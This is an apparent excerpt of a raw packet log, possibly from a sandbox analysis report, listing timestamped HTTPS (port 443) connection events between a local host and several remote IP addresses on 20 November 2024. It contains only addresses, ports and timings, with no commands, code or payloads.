                                                                                                                                                                                                Nov 20, 2024 10:54:26.484289885 CET4434975913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.485275030 CET49759443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.485289097 CET4434975913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.485944033 CET49759443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.485951900 CET4434975913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.544047117 CET4434976113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.544763088 CET49761443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.544780970 CET4434976113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.545238018 CET49761443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.545243025 CET4434976113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.550755978 CET4434976013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.551333904 CET49760443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.551347971 CET4434976013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.551687002 CET49760443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.551691055 CET4434976013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.563033104 CET4434976213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.563555956 CET49762443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.563565969 CET4434976213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.563956022 CET49762443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.563961029 CET4434976213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.591146946 CET4434975913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.591280937 CET4434975913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.591376066 CET49759443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.591563940 CET49759443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.591578960 CET4434975913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.591675043 CET49759443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.591681004 CET4434975913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.594963074 CET49764443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.594995022 CET4434976413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.595086098 CET49764443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.595247984 CET49764443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.595257998 CET4434976413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.628282070 CET44349758188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.628442049 CET44349758188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.628531933 CET49758443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:26.628726006 CET49758443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:26.628735065 CET44349758188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.646704912 CET4434976113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.646867990 CET4434976113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.646925926 CET49761443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.649966002 CET49761443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.649991035 CET4434976113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.650005102 CET49761443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.650019884 CET4434976113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.654158115 CET4434976313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.655020952 CET4434976013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.655203104 CET4434976013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.655282974 CET49760443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.656023026 CET49763443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.656049013 CET4434976313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.656656027 CET49763443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.656666040 CET4434976313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.657083035 CET49760443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.657094002 CET4434976013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.657164097 CET49760443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.657169104 CET4434976013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.664701939 CET49765443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.664722919 CET4434976513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.664807081 CET49765443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.665000916 CET49765443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.665014029 CET4434976513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.666929007 CET4434976213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.666974068 CET4434976213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.667079926 CET49762443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.668312073 CET49766443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.668323040 CET4434976613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.668394089 CET49766443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.668503046 CET49766443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.668512106 CET4434976613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.672800064 CET49762443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.672800064 CET49762443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.672816992 CET4434976213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.672827005 CET4434976213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.676090956 CET49767443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.676100969 CET4434976713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.676167011 CET49767443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.677567959 CET49767443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.677577972 CET4434976713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.761063099 CET4434976313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.761117935 CET4434976313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.761204958 CET49763443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.761396885 CET49763443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.761409998 CET4434976313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.761424065 CET49763443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.761430979 CET4434976313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.766179085 CET49768443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.766192913 CET4434976813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:26.766263008 CET49768443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.766769886 CET49768443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:26.766781092 CET4434976813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.220402002 CET49769443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:27.220419884 CET44349769188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.220487118 CET49769443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:27.220865011 CET49769443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:27.220880985 CET44349769188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.235855103 CET4434976413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.236357927 CET49764443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.236371040 CET4434976413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.236824036 CET49764443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.236828089 CET4434976413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.316237926 CET4434976713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.316803932 CET49767443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.316829920 CET4434976713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.317292929 CET49767443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.317300081 CET4434976713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.318373919 CET4434976613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.318710089 CET49766443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.318717003 CET4434976613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.319124937 CET49766443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.319128990 CET4434976613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.319144011 CET4434976513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.319396019 CET49765443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.319406986 CET4434976513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.319761992 CET49765443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.319767952 CET4434976513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.339432001 CET4434976413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.339487076 CET4434976413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.339539051 CET49764443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.339750051 CET49764443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.339759111 CET4434976413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.339766026 CET49764443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.339771032 CET4434976413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.342665911 CET49770443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.342691898 CET4434977013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.342761993 CET49770443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.342897892 CET49770443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.342909098 CET4434977013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.416035891 CET4434976713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.416085958 CET4434976713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.416169882 CET49767443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.416385889 CET49767443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.416412115 CET4434976713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.416423082 CET49767443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.416429996 CET4434976713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.418853045 CET49771443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.418889046 CET4434977113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.418972969 CET49771443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.419101000 CET49771443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.419116020 CET4434977113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.419416904 CET4434976613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.419603109 CET4434976613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.419655085 CET49766443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.419681072 CET49766443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.419686079 CET4434976613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.419697046 CET49766443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.419701099 CET4434976613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.421016932 CET4434976513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.421089888 CET4434976513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.421140909 CET49765443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.421230078 CET49765443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.421235085 CET4434976513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.421251059 CET49765443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.421256065 CET4434976513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.422527075 CET49772443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.422600985 CET4434977213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.422676086 CET49772443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.422770023 CET49772443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.422807932 CET4434977213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.423867941 CET49773443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.423897028 CET4434977313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.423974991 CET49773443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.424320936 CET49773443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.424335003 CET4434977313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.430341959 CET4434976813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.433532000 CET49768443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.433541059 CET4434976813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.434032917 CET49768443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.434037924 CET4434976813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.544083118 CET4434976813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.544153929 CET4434976813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.544207096 CET49768443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.544373989 CET49768443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.544384003 CET4434976813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.544393063 CET49768443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.544398069 CET4434976813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.546962023 CET49774443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.547027111 CET4434977413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.547110081 CET49774443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.547261000 CET49774443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:27.547292948 CET4434977413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.646527052 CET44349702104.98.116.138192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.646771908 CET49702443192.168.2.7104.98.116.138
                                                                                                                                                                                                Nov 20, 2024 10:54:27.704082966 CET44349769188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.704193115 CET49769443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:27.705502033 CET49769443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:27.705514908 CET44349769188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.705858946 CET44349769188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.707142115 CET49769443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:27.707241058 CET49769443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:27.707247019 CET44349769188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.957968950 CET44349769188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.958101034 CET44349769188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:27.958164930 CET49769443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:27.958265066 CET49769443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:27.958276987 CET44349769188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.019579887 CET4434977013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.020191908 CET49770443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.020206928 CET4434977013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.020631075 CET49770443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.020636082 CET4434977013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.071183920 CET4434977313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.072067976 CET49773443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.072081089 CET4434977313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.072503090 CET49773443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.072509050 CET4434977313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.073782921 CET4434977213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.074304104 CET49772443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.074371099 CET4434977213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.074923038 CET49772443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.074939013 CET4434977213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.103596926 CET4434977113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.104481936 CET49771443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.104494095 CET4434977113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.105269909 CET49771443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.105274916 CET4434977113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.127630949 CET4434977013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.127681971 CET4434977013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.127748013 CET49770443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.137365103 CET49770443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.137379885 CET4434977013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.137387991 CET49770443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.137392998 CET4434977013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.157279015 CET49775443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.157320976 CET4434977513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.157439947 CET49775443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.157725096 CET49775443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.157741070 CET4434977513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.174124002 CET4434977313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.174355984 CET4434977313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.174442053 CET49773443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.174648046 CET49773443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.174648046 CET49773443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.174660921 CET4434977313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.174670935 CET4434977313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.179088116 CET4434977213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.179280043 CET4434977213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.179352045 CET49772443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.179454088 CET49772443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.179454088 CET49772443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.179491997 CET4434977213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.179517984 CET4434977213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.184434891 CET49776443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.184465885 CET4434977613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.184540987 CET49776443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.184947968 CET49776443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.184962034 CET4434977613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.185945988 CET49777443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.185955048 CET4434977713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.186012030 CET49777443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.186131001 CET49777443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.186140060 CET4434977713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.213381052 CET4434977413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.215668917 CET4434977113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.215733051 CET4434977113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.215814114 CET49771443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.216523886 CET49771443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.216528893 CET49774443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.216533899 CET4434977113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.216546059 CET49771443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.216551065 CET4434977113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.216573000 CET4434977413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.216960907 CET49774443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.216978073 CET4434977413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.219140053 CET49778443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.219151974 CET4434977813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.219502926 CET49778443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.219851017 CET49778443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.219862938 CET4434977813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.316587925 CET4434977413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.316659927 CET4434977413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.316751003 CET49774443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.316992044 CET49774443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.317008018 CET4434977413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.317035913 CET49774443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.317042112 CET4434977413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.319555998 CET49779443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.319578886 CET4434977913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.320251942 CET49779443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.320414066 CET49779443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.320424080 CET4434977913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.456253052 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.456278086 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.456362009 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.456657887 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:28.456669092 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.825098991 CET4434977713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.825752020 CET49777443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.825767994 CET4434977713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:28.826185942 CET49777443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:28.826190948 CET4434977713.107.246.45192.168.2.7
